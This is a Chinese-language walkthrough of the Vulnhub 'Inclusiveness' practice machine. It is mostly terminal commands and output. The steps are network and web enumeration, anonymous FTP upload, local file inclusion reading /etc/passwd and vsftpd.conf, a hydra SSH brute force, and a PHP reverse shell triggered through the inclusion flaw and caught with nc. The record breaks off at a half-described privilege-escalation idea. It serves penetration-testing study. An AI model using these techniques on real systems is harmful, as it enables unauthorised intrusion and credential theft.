Vulnhub之Inclusiveness靶机详细测试过程

Inclusiveness

识别目标主机IP地址

1. ─(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3. Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                       
4.                                                                                                                                                             
5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
6. _____________________________________________________________________________
7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
8. -----------------------------------------------------------------------------
9. 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                          
10. 192.168.56.100  08:00:27:44:49:32      1      60  PCS Systemtechnik GmbH                                                                                   
11. 192.168.56.111  08:00:27:51:1a:1d      1      60  PCS Systemtechnik GmbH   

复制代码

利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.111
NMAP扫描

1. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.111 -oN nmap_full_scan
2. Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-18 21:55 EDT
3. Nmap scan report for bogon (192.168.56.111)
4. Host is up (0.000099s latency).
5. Not shown: 65532 closed tcp ports (reset)
6. PORT   STATE SERVICE VERSION
7. 21/tcp open  ftp     vsftpd 3.0.3
8. | ftp-anon: Anonymous FTP login allowed (FTP code 230)
9. |_drwxrwxrwx    2 0        0            4096 Feb 08  2020 pub [NSE: writeable]
10. | ftp-syst:
11. |   STAT:
12. | FTP server status:
13. |      Connected to ::ffff:192.168.56.230
14. |      Logged in as ftp
15. |      TYPE: ASCII
16. |      No session bandwidth limit
17. |      Session timeout in seconds is 300
18. |      Control connection is plain text
19. |      Data connections will be plain text
20. |      At session startup, client count was 4
21. |      vsFTPd 3.0.3 - secure, fast, stable
22. |_End of status
23. 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
24. | ssh-hostkey:
25. |   2048 06:1b:a3:92:83:a5:7a:15:bd:40:6e:0c:8d:98:27:7b (RSA)
26. |   256 cb:38:83:26:1a:9f:d3:5d:d3:fe:9b:a1:d3:bc:ab:2c (ECDSA)
27. |_  256 65:54:fc:2d:12:ac:e1:84:78:3e:00:23:fb:e4:c9:ee (ED25519)
28. 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
29. |_http-title: Apache2 Debian Default Page: It works
30. |_http-server-header: Apache/2.4.38 (Debian)
31. MAC Address: 08:00:27:51:1A:1D (Oracle VirtualBox virtual NIC)
32. Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
34. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
35. Nmap done: 1 IP address (1 host up) scanned in 10.29 seconds

复制代码

NMAP扫描结果表明目标主机有3个开放端口：21（ftp)、22（ssh)、80(http)
获得Shell

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
2. └─$ ftp 192.168.56.111
3. Connected to 192.168.56.111.
4. 220 (vsFTPd 3.0.3)
5. Name (192.168.56.111:kali): anonymous
6. 331 Please specify the password.
7. Password:
8. 230 Login successful.
9. Remote system type is UNIX.
10. Using binary mode to transfer files.
11. ftp> ls -alh
12. 229 Entering Extended Passive Mode (|||37352|)
13. 150 Here comes the directory listing.
14. drwxr-xr-x    3 0        0            4096 Feb 08  2020 .
15. drwxr-xr-x    3 0        0            4096 Feb 08  2020 ..
16. drwxrwxrwx    2 0        0            4096 Feb 08  2020 pub
17. 226 Directory send OK.
18. ftp> cd pub
19. 250 Directory successfully changed.
20. ftp> ls -alh
21. 229 Entering Extended Passive Mode (|||40199|)
22. 150 Here comes the directory listing.
23. drwxrwxrwx    2 0        0            4096 Feb 08  2020 .
24. drwxr-xr-x    3 0        0            4096 Feb 08  2020 ..
25. 226 Directory send OK.
26. ftp> put test.txt
27. local: test.txt remote: test.txt
28. 229 Entering Extended Passive Mode (|||43004|)
29. 150 Ok to send data.
30. 100% |****************************************************************************************************************|    12      229.77 KiB/s    00:00 ETA
31. 226 Transfer complete.
32. 12 bytes sent in 00:00 (14.98 KiB/s)
33. ftp> pwd
34. Remote directory: /pub
35. ftp> cd ..
36. 250 Directory successfully changed.
37. ftp> ls
38. 229 Entering Extended Passive Mode (|||30574|)
39. 150 Here comes the directory listing.
40. drwxrwxrwx    2 0        0            4096 Apr 19 11:57 pub
41. 226 Directory send OK.
42. ftp> pwd
43. Remote directory: /
44. ftp>

复制代码

对FTP服务的信息收集结果如下：

• 目标主机允许匿名访问
  
• 匿名用户允许上传文件
  
• 匿名用户无法变换目录
  
• FTP服务版本没有漏洞可利用
  

1. ──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
2. └─$ curl http://192.168.56.111/robots.txt           
3. You are not a search engine! You can't read my robots.txt!

复制代码

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
2. └─$ curl http://192.168.56.111/robots.txt           
3. You are not a search engine! You can't read my robots.txt!                                                                                                                                                             ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]└─$ nikto -h http://192.168.56.111      - Nikto v2.1.6---------------------------------------------------------------------------+ Target IP:          192.168.56.111+ Target Hostname:    192.168.56.111+ Target Port:        80+ Start Time:         2023-04-18 22:01:58 (GMT-4)---------------------------------------------------------------------------+ Server: Apache/2.4.38 (Debian)+ The anti-clickjacking X-Frame-Options header is not present.+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type+ No CGI Directories found (use '-C all' to force check all possible dirs)+ Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 59e071e146cc0, mtime: gzip+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD + OSVDB-3092: /manual/: Web server manual found.+ OSVDB-3268: /manual/images/: Directory indexing found.+ OSVDB-3233: /icons/README: Apache default file found.+ 7915 requests: 0 error(s) and 8 item(s) reported on remote host+ End Time:           2023-04-18 22:02:57 (GMT-4) (59 seconds)---------------------------------------------------------------------------+ 1 host(s) tested      *********************************************************************      Portions of the server's headers (Apache/2.4.38) are not in      the Nikto 2.1.6 database or are newer than the known string. Would you like      to submit this information (*no server specific data*) to CIRT.net      for a Nikto update (or you may email to sullo@cirt.net) (y/n)?

复制代码

接下来做一下目录扫描：

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
2. └─$ gobuster dir -u http://192.168.56.111 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js      
3. ===============================================================
4. Gobuster v3.5
5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6. ===============================================================
7. [+] Url:                     http://192.168.56.111
8. [+] Method:                  GET
9. [+] Threads:                 10
10. [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
11. [+] Negative Status codes:   404
12. [+] User Agent:              gobuster/3.5
13. [+] Extensions:              js,php,html,txt,sh
14. [+] Timeout:                 10s
15. ===============================================================
16. 2023/04/18 22:04:22 Starting gobuster in directory enumeration mode
17. ===============================================================
18. /.html                (Status: 403) [Size: 279]
19. /index.html           (Status: 200) [Size: 10701]
20. /.php                 (Status: 403) [Size: 279]
21. /manual               (Status: 301) [Size: 317] [--> http://192.168.56.111/manual/]
22. /javascript           (Status: 301) [Size: 321] [--> http://192.168.56.111/javascript/]
23. /robots.txt           (Status: 200) [Size: 59]
24. /seo.html             (Status: 200) [Size: 59]
25. /.php                 (Status: 403) [Size: 279]
26. /.html                (Status: 403) [Size: 279]
27. /norobots.txt         (Status: 200) [Size: 59]
28. /robots-txt           (Status: 200) [Size: 59]
29. /robots-txt.html      (Status: 200) [Size: 59]
30. /robots-txt.txt       (Status: 200) [Size: 59]
31. /robots-txt.sh        (Status: 200) [Size: 59]
32. /robots-txt.php       (Status: 200) [Size: 59]
33. /robots-txt.js        (Status: 200) [Size: 59]
34. /server-status        (Status: 403) [Size: 279]
35. /valid-robots.txt     (Status: 200) [Size: 59]
36. Progress: 1321170 / 1323366 (99.83%)
37. ===============================================================
38. 2023/04/18 22:09:48 Finished

复制代码

发现了很多robots.txt等文件，但是访问这些文件，返回的内容均为：You are not a search engine! You can't read my robots.txt!
但即使用Burpsuite拦截请求，修改User Agent为搜索引擎的UA：Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
得到的返回内容是一样的
但是其实这个方向是对的，可能修改后的User Agent不能有其他信息，否则后台在做匹配的时候匹配不上，将User-agetn改为Googlebot
发现了目录/secret_information,经过测试，如果在Googlebot字符串另外增加任意字符都可能导致无法得到正确结果，但是其实之前的googlebot的UA是真正的谷歌爬虫用的UA，也许这是渗透测试而已。

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
2. └─$ curl http://192.168.56.111/secret_information/
3. <title>zone transfer</title>
5. <h2>DNS Zone Transfer Attack</h2>
7. <p><a target="_blank" href='https://www.cnblogs.com/?lang=en.php'>english</a> <a target="_blank" href='https://www.cnblogs.com/?lang=es.php'>spanish</a></p>
9. DNS Zone transfer is the process where a DNS server passes a copy of part of it's database (which is called a "zone") to another DNS server. It's how you can have more than one DNS server able to answer queries about a particular zone; there is a Master DNS server, and one or more Slave DNS servers, and the slaves ask the master for a copy of the records for that zone.
11. A basic DNS Zone Transfer Attack isn't very fancy: you just pretend you are a slave and ask the master for a copy of the zone records. And it sends you them; DNS is one of those really old-school Internet protocols that was designed when everyone on the Internet literally knew everyone else's name and address, and so servers trusted each other implicitly.
13. It's worth stopping zone transfer attacks, as a copy of your DNS zone may reveal a lot of topological information about your internal network. In particular, if someone plans to subvert your DNS, by poisoning or spoofing it, for example, they'll find having a copy of the real data very useful.
15. So best practice is to restrict Zone transfers. At the bare minimum, you tell the master what the IP addresses of the slaves are and not to transfer to anyone else. In more sophisticated set-ups, you sign the transfers. So the more sophisticated zone transfer attacks try and get round these controls.

复制代码

secret_information页面有链接，从URL看可能存在本地文件包含漏洞

1. http://192.168.56.111/secret_information/?lang=en.php

复制代码

1. ──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
2. └─$ curl http://192.168.56.111/secret_information/?lang=../../../../../etc/passwd
3. <title>zone transfer</title>
5. <h2>DNS Zone Transfer Attack</h2>
7. <p><a target="_blank" href='https://www.cnblogs.com/?lang=en.php'>english</a> <a target="_blank" href='https://www.cnblogs.com/?lang=es.php'>spanish</a></p>
9. root:x:0:0:root:/root:/bin/bash
10. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
11. bin:x:2:2:bin:/bin:/usr/sbin/nologin
12. sys:x:3:3:sys:/dev:/usr/sbin/nologin
13. sync:x:4:65534:sync:/bin:/bin/sync
14. games:x:5:60:games:/usr/games:/usr/sbin/nologin
15. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
16. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
17. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
18. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
19. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
20. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
21. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
22. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
23. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
24. irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
25. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
26. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
27. _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
28. systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
29. systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
30. systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
31. messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
32. tss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false
33. dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
34. avahi-autoipd:x:107:114:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
35. usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
36. rtkit:x:109:115:RealtimeKit,,,:/proc:/usr/sbin/nologin
37. sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
38. avahi:x:113:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
39. saned:x:114:121::/var/lib/saned:/usr/sbin/nologin
40. colord:x:115:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
41. geoclue:x:116:123::/var/lib/geoclue:/usr/sbin/nologin
42. tom:x:1000:1000:Tom,,,:/home/tom:/bin/bash
43. systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
44. ftp:x:118:125:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin

复制代码

目标主机确实存在本地文件包含漏洞，接下来就看如何利用本地文件包含漏洞得到Shell
并且识别出用户名：tom

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
2. └─$ curl http://192.168.56.111/secret_information/?lang=../../../../../home/tom/.ssh/id_rsa
3. <title>zone transfer</title>
5. <h2>DNS Zone Transfer Attack</h2>
7. <p><a target="_blank" href='https://www.cnblogs.com/?lang=en.php'>english</a> <a target="_blank" href='https://www.cnblogs.com/?lang=es.php'>spanish</a></p>

复制代码

没有发现tom用户的ssh私钥文件。
接下来看是否存在远程文件包含漏洞

1. http://192.168.56.111/secret_information/?lang=http://192.168.56.230:8000/test.txt

复制代码

经过测试，目标主机并不存在远程文件包含漏洞。
看下是否可以暴力破解出tom的密码

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
2. └─$ hydra -l tom -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.111                                                                                 
3. Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
5. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-18 22:48:23
6. [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
7. [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
8. [DATA] attacking ssh://192.168.56.111:22/
9. [STATUS] 141.00 tries/min, 141 tries in 00:01h, 14344260 to do in 1695:33h, 14 active
10. [STATUS] 98.67 tries/min, 296 tries in 00:03h, 14344105 to do in 2422:60h, 14 active
11. ^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

复制代码

并没有破解出ssh的密码，也没有破解出ftp的密码。
接下来将php rerverse代码通过ftp上传至目标主机，但是关键问题是找到该文件的绝对路径，然后通过本地文件包含漏洞得到shell

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
2. └─$ ftp 192.168.56.111
3. Connected to 192.168.56.111.
4. 220 (vsFTPd 3.0.3)
5. Name (192.168.56.111:kali): anonymous
6. 331 Please specify the password.
7. Password:
8. 230 Login successful.
9. Remote system type is UNIX.
10. Using binary mode to transfer files.
11. ftp> put shell.php
12. local: shell.php remote: shell.php
13. 229 Entering Extended Passive Mode (|||5748|)
14. 553 Could not create file.
15. ftp> cd pub
16. 250 Directory successfully changed.
17. ftp> put shell.php
18. local: shell.php remote: shell.php
19. 229 Entering Extended Passive Mode (|||13252|)
20. 150 Ok to send data.
21. 100% |****************************************************************************************************************|  5496       43.31 MiB/s    00:00 ETA
22. 226 Transfer complete.
23. 5496 bytes sent in 00:00 (6.80 MiB/s)
24. ftp> quit
25. 221 Goodbye.

复制代码

找到shell.php的绝对路径需要首先查看vsftpd的配置配置文件（前面nmap扫描已经知道ftp服务为vsftpd)
经过查询一般来说vsftpd的配置文件位置：/etc/vsftpd/vsftpd.conf
但是访问该位置，并没有得到相应的返回：

1. http://192.168.56.111/secret_information/?lang=../../../../etc/vsftpd/vsftpd.conf

复制代码

把中间的这级目录去掉，再次访问

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
2. └─$ curl http://192.168.56.111/secret_information/?lang=../../../../etc/vsftpd.conf
3. <title>zone transfer</title>
5. <h2>DNS Zone Transfer Attack</h2>
7. <p><a target="_blank" href='https://www.cnblogs.com/?lang=en.php'>english</a> <a target="_blank" href='https://www.cnblogs.com/?lang=es.php'>spanish</a></p>
9. # Example config file /etc/vsftpd.conf
10. #
11. # The default compiled in settings are fairly paranoid. This sample file
12. # loosens things up a bit, to make the ftp daemon more usable.
13. # Please see vsftpd.conf.5 for all compiled in defaults.
14. #
15. # READ THIS: This example file is NOT an exhaustive list of vsftpd options.
16. # Please read the vsftpd.conf.5 manual page to get a full idea of vsftpd's
17. # capabilities.
18. #
19. #
20. # Run standalone?  vsftpd can run either from an inetd or as a standalone
21. # daemon started from an initscript.
23. anon_umask=000
25. listen=NO
26. #
27. # This directive enables listening on IPv6 sockets. By default, listening
28. # on the IPv6 "any" address (::) will accept connections from both IPv6
29. # and IPv4 clients. It is not necessary to listen on *both* IPv4 and IPv6
30. # sockets. If you want that (perhaps because you want to listen on specific
31. # addresses) then you must run two copies of vsftpd with two configuration
32. # files.
33. listen_ipv6=YES
34. #
35. # Allow anonymous FTP? (Disabled by default).
36. anonymous_enable=YES
37. #
38. # Uncomment this to allow local users to log in.
39. local_enable=YES
40. #
41. # Uncomment this to enable any form of FTP write command.
42. #write_enable=YES
43. #
44. # Default umask for local users is 077. You may wish to change this to 022,
45. # if your users expect that (022 is used by most other ftpd's)
46. local_umask=022
47. #
48. # Uncomment this to allow the anonymous FTP user to upload files. This only
49. # has an effect if the above global write enable is activated. Also, you will
50. # obviously need to create a directory writable by the FTP user.
51. anon_upload_enable=YES
52. #
53. # Uncomment this if you want the anonymous FTP user to be able to create
54. # new directories.
55. #anon_mkdir_write_enable=YES
56. #
57. # Activate directory messages - messages given to remote users when they
58. # go into a certain directory.
59. dirmessage_enable=YES
60. #
61. # If enabled, vsftpd will display directory listings with the time
62. # in  your  local  time  zone.  The default is to display GMT. The
63. # times returned by the MDTM FTP command are also affected by this
64. # option.
65. use_localtime=YES
66. #
67. # Activate logging of uploads/downloads.
68. xferlog_enable=YES
69. #
70. # Make sure PORT transfer connections originate from port 20 (ftp-data).
71. connect_from_port_20=YES
72. #
73. # If you want, you can arrange for uploaded anonymous files to be owned by
74. # a different user. Note! Using "root" for uploaded files is not
75. # recommended!
76. #chown_uploads=YES
77. #chown_username=whoever
78. #
79. # You may override where the log file goes if you like. The default is shown
80. # below.
81. #xferlog_file=/var/log/vsftpd.log
82. #
83. # If you want, you can have your log file in standard ftpd xferlog format.
84. # Note that the default log file location is /var/log/xferlog in this case.
85. #xferlog_std_format=YES
86. #
87. # You may change the default value for timing out an idle session.
88. #idle_session_timeout=600
89. #
90. # You may change the default value for timing out a data connection.
91. #data_connection_timeout=120
92. #
93. # It is recommended that you define on your system a unique user which the
94. # ftp server can use as a totally isolated and unprivileged user.
95. #nopriv_user=ftpsecure
96. #
97. # Enable this and the server will recognise asynchronous ABOR requests. Not
98. # recommended for security (the code is non-trivial). Not enabling it,
99. # however, may confuse older FTP clients.
100. #async_abor_enable=YES
101. #
102. # By default the server will pretend to allow ASCII mode but in fact ignore
103. # the request. Turn on the below options to have the server actually do ASCII
104. # mangling on files when in ASCII mode.
105. # Beware that on some FTP servers, ASCII support allows a denial of service
106. # attack (DoS) via the command "SIZE /big/file" in ASCII mode. vsftpd
107. # predicted this attack and has always been safe, reporting the size of the
108. # raw file.
109. # ASCII mangling is a horrible feature of the protocol.
110. #ascii_upload_enable=YES
111. #ascii_download_enable=YES
112. #
113. # You may fully customise the login banner string:
114. #ftpd_banner=Welcome to blah FTP service.
115. #
116. # You may specify a file of disallowed anonymous e-mail addresses. Apparently
117. # useful for combatting certain DoS attacks.
118. #deny_email_enable=YES
119. # (default follows)
120. #banned_email_file=/etc/vsftpd.banned_emails
121. #
122. # You may restrict local users to their home directories.  See the FAQ for
123. # the possible risks in this before using chroot_local_user or
124. # chroot_list_enable below.
125. #chroot_local_user=YES
126. #
127. # You may specify an explicit list of local users to chroot() to their home
128. # directory. If chroot_local_user is YES, then this list becomes a list of
129. # users to NOT chroot().
130. # (Warning! chroot'ing can be very dangerous. If using chroot, make sure that
131. # the user does not have write access to the top level directory within the
132. # chroot)
133. #chroot_local_user=YES
134. #chroot_list_enable=YES
135. # (default follows)
136. #chroot_list_file=/etc/vsftpd.chroot_list
137. #
138. # You may activate the "-R" option to the builtin ls. This is disabled by
139. # default to avoid remote users being able to cause excessive I/O on large
140. # sites. However, some broken FTP clients such as "ncftp" and "mirror" assume
141. # the presence of the "-R" option, so there is a strong case for enabling it.
142. #ls_recurse_enable=YES
143. #
144. # Customization
145. #
146. # Some of vsftpd's settings don't fit the filesystem layout by
147. # default.
148. #
149. # This option should be the name of a directory which is empty.  Also, the
150. # directory should not be writable by the ftp user. This directory is used
151. # as a secure chroot() jail at times vsftpd does not require filesystem
152. # access.
153. secure_chroot_dir=/var/run/vsftpd/empty
154. #
155. # This string is the name of the PAM service vsftpd will use.
156. pam_service_name=vsftpd
157. #
158. # This option specifies the location of the RSA certificate to use for SSL
159. # encrypted connections.
160. rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
161. rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
162. ssl_enable=NO
164. #
165. # Uncomment this to indicate that vsftpd use a utf8 filesystem.
166. #utf8_filesystem=YES
167. #
168. # Point users at the directory we created earlier.
169. anon_root=/var/ftp/
170. write_enable=YES

复制代码

读取到vsftpd.conf文件内容，可知对于匿名用户的目录为/var/ftp,然后加上pub，即可访问到我们上传的shell.php

1. http://192.168.56.111/secret_information/?lang=../../../../var/ftp/pub/shell.php

复制代码

1. ──(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]
2. └─$ sudo nc -nlvp 5555
3. [sudo] password for kali:
4. listening on [any] 5555 ...
5. connect to [192.168.56.230] from (UNKNOWN) [192.168.56.111] 41434
6. Linux inclusiveness 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux
7. 13:17:25 up  1:29,  0 users,  load average: 0.00, 0.05, 0.28
8. USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
9. uid=33(www-data) gid=33(www-data) groups=33(www-data)
10. /bin/sh: 0: can't access tty; job control turned off
11. $ id
12. uid=33(www-data) gid=33(www-data) groups=33(www-data)
13. $ which python
14. /usr/bin/python
15. $ python -c 'import pty;pty.spawn("/bin/bash")'
16. www-data@inclusiveness:/$ cd /home
17. cd /home
18. www-data@inclusiveness:/home$ ls -alh
19. ls -alh
20. total 12K
21. drwxr-xr-x  3 root root 4.0K Feb  8  2020 .
22. drwxr-xr-x 19 root root 4.0K Feb  8  2020 ..
23. drwxr-xr-x 15 tom  tom  4.0K Feb  8  2020 tom

复制代码

读了一下rootshell.c的内容，发现它是通过whoami这个命令来获取当前用户名的,我们可以生成我们自己的whoami，但是这个whomai返回是tom,这样rootshell得到的用户名就是tom
[code][/code]
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！